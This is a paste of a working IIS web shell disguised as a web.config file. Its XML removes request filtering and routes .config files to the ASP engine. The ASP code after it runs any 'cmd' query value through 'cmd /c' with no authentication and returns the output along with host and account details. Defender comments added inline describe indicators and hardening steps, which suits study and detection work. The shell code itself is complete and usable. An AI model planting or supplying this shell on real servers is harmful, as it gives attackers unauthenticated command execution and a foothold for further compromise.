
web.config_shell

gm0
Jul 10th, 2018
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <configuration>
      <!-- Defender note: this is not an ordinary site configuration. Its three overrides
           (a handler for *.config, removal of the .config extension filter, removal of the
           web.config hidden segment) make the configuration file itself requestable and
           route it to the classic ASP engine; the apparent intent is to run the ASP code
           that follows the XML in this same paste.
           Triage: a web.config carrying this combination inside a content or upload
           directory should be treated as an indicator of compromise.
           Hardening: keep system.webServer/handlers and
           system.webServer/security/requestFiltering locked at server level
           (overrideMode set to Deny in applicationHost.config) wherever users can write
           files, and do not give the application pool identity write access to directories
           from which IIS reads configuration. -->
  3. <system.webServer>
      <!-- accessPolicy here grants Script and Write in addition to Read; the handler
           below declares requireAccess="Write", so it depends on this grant. -->
  4. <handlers accessPolicy="Read, Script, Write">
      <!-- Maps every request whose path matches *.config, for any HTTP verb, to asp.dll
           through IsapiModule. preCondition="bitness64" limits the mapping to 64-bit
           worker processes. Detection: a scriptProcessor pointing at asp.dll for a
           path of *.config has no legitimate use in a site-level web.config. -->
  5. <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified"
  6. requireAccess="Write" preCondition="bitness64" />
  7. </handlers>
  8. <security>
      <!-- The two remove entries below delete request-filtering rules for this directory:
           the rule covering the .config file extension and the hidden segment that keeps
           web.config from being requested over HTTP. Successful (non-404) responses for a
           URL ending in web.config are worth alerting on in IIS logs. -->
  9. <requestFiltering>
  10. <fileExtensions>
  11. <remove fileExtension=".config" />
  12. </fileExtensions>
  13. <hiddenSegments>
  14. <remove segment="web.config" />
  15. </hiddenSegments>
  16. </requestFiltering>
  17. </security>
  18. </system.webServer>
  19. </configuration>
  20. <!--
  21. ASP Webshell
  22. Working on latest IIS
  23. References:
  24. https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp
  25. http://stackoverflow.com/questions/11501044/i-need-execute-a-command-line-in-a-visual-basic-script
  26. http://www.w3schools.com/asp/
  27. -->
  28.  
  29.  
  30. <%
      ' Defender note: server-side classic ASP (VBScript) part of the web shell.
      ' The ProgIDs created below (WSCRIPT.SHELL, WSCRIPT.NETWORK,
      ' Scripting.FileSystemObject) are useful content-scanning strings when they
      ' appear in a file named web.config or in any file under an upload directory.
      ' In the visible listing only oScriptNet is used later; oScript and oFileSys
      ' are created but never referenced.
  31. Set oScript = Server.CreateObject("WSCRIPT.SHELL")
  32. Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  33. Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
      ' getCommandOutput(theCommand): starts theCommand as a child process through
      ' WScript.Shell.Exec and returns everything the process wrote to standard output.
      ' Standard error is not read. The process is created by the IIS worker, so
      ' endpoint telemetry showing w3wp.exe as the parent of a command interpreter is
      ' the most reliable runtime signal for this code.
  34. Function getCommandOutput(theCommand)
  35. Dim objShell, objCmdExec
  36. Set objShell = CreateObject("WScript.Shell")
  37. Set objCmdExec = objshell.exec(thecommand)
  38. getCommandOutput = objCmdExec.StdOut.ReadAll
  39. end Function
  40. %>
  41.  
  42.  
  43. <HTML>
  44. <BODY>
      <!-- Defender note: operator-facing page of the web shell. The form submits a single
           field named cmd with method GET, so each submitted value travels in the query
           string and is recorded by IIS W3C logging when the cs-uri-query field is enabled.
           Hunting for requests to a path ending in web.config that carry a cmd parameter
           is a direct way to find use of this file. There is no authentication check
           anywhere in the visible page. -->
  45. <FORM action="" method="GET">
  46. <input type="text" name="cmd" size=45 value="<%= szCMD %>">
  47. <input type="submit" value="Run">
  48. </FORM>
  49. <PRE>
      <!-- The lines below write host details into every response: computer name and the
           account name reported by WScript.Network, then the server_name, server_port,
           server_software and LOCAL_ADDR server variables. The account name shown is the
           identity the page runs as, which is what incident responders need in order to
           scope what the shell could reach. -->
  50. <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
  51. <%Response.Write(Request.ServerVariables("server_name"))%>
  52. <p>
  53. <b>The server's port:</b>
  54. <%Response.Write(Request.ServerVariables("server_port"))%>
  55. </p>
  56. <p>
  57. <b>The server's software:</b>
  58. <%Response.Write(Request.ServerVariables("server_software"))%>
  59. </p>
  60. <p>
      <!-- The label below repeats "The server's software:" but the value written is
           LOCAL_ADDR, the server's local IP address. -->
  61. <b>The server's software:</b>
  62. <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
      <!-- The request value cmd is read without validation, passed to getCommandOutput,
           and the returned text is written to the response without HTML encoding. -->
  63. <% szCMD = request("cmd")
  64. thisDir = getCommandOutput("cmd /c" & szCMD)
  65. Response.Write(thisDir)%>
  66. </p>
  67. <br>
  68. </BODY>
  69. </HTML>